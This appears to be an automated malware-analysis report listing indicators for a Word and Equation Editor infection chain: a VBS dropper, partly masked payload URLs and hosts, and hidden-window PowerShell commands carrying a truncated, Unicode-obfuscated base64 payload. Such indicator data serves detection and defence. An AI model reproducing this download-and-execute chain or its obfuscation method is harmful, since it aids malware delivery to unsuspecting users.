Technical Information
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\verynicebuttermilkchocolateiss.vBS"
- %APPDATA%\verynicebuttermilkchocolateiss.vbs
- 'to#e.cc':443
- '10#.#72.31.21':80
- 'ia#####4.us.archive.org':443
- http://10#.#72.31.21/xampp/kkb/kk/wecreatebuttermilkchocolateicreamwithbutterburnwhicverytastewithamericanbutterchoclatewithgoodthings____yummybuttermilkcream.doc
- http://10#.#72.31.21/xampp/kkb/verynicebuttermilkchocolateicce.tIF
- 'to#e.cc':443
- 'ia#####4.us.archive.org':443
- DNS ASK to#e.cc
- DNS ASK ia#####4.us.archive.org
- '%ProgramFiles%\microsoft office\office14\winword.exe' -Embedding
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command $Codigo = 'J⇉ ⟘ ؎ ▞ ⥞Bp⇉ ⟘ ؎ ▞ ⥞G0⇉ ⟘ ؎ ▞ ⥞YQBn⇉ ⟘ ؎ ▞ ⥞GU⇉ ⟘ ؎ ▞ ⥞VQBy⇉ ⟘ ؎ ▞ ⥞Gw⇉ ⟘ ؎ ▞ ⥞I⇉ ⟘ ؎ ▞ ⥞⇉ ⟘ ؎ ▞ ⥞9⇉ ⟘ ؎ ▞ ⥞C⇉ ⟘ ؎ ▞ ⥞⇉ ⟘ ؎ ▞ ⥞JwBo⇉ ⟘ ؎ ▞ ⥞HQ⇉ ⟘ ؎ ▞ ⥞d⇉ ⟘ ؎ ▞ ⥞Bw⇉ ⟘ ؎ ▞ ⥞...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command $Codigo = 'J⇉ ⟘ ؎ ▞ ⥞Bp⇉ ⟘ ؎ ▞ ⥞G0⇉ ⟘ ؎ ▞ ⥞YQBn⇉ ⟘ ؎ ▞ ⥞GU⇉ ⟘ ؎ ▞ ⥞VQBy⇉ ⟘ ؎ ▞ ⥞Gw⇉ ⟘ ؎ ▞ ⥞I⇉ ⟘ ؎ ▞ ⥞⇉ ⟘ ؎ ▞ ⥞9⇉ ⟘ ؎ ▞ ⥞C⇉ ⟘ ؎ ▞ ⥞⇉ ⟘ ؎ ▞ ⥞JwBo⇉ ⟘ ؎ ▞ ⥞HQ⇉ ⟘ ؎ ▞ ⥞d⇉ ⟘ ؎ ▞ ⥞Bw⇉ ⟘ ؎ ▞ ⥞...' (with hidden window)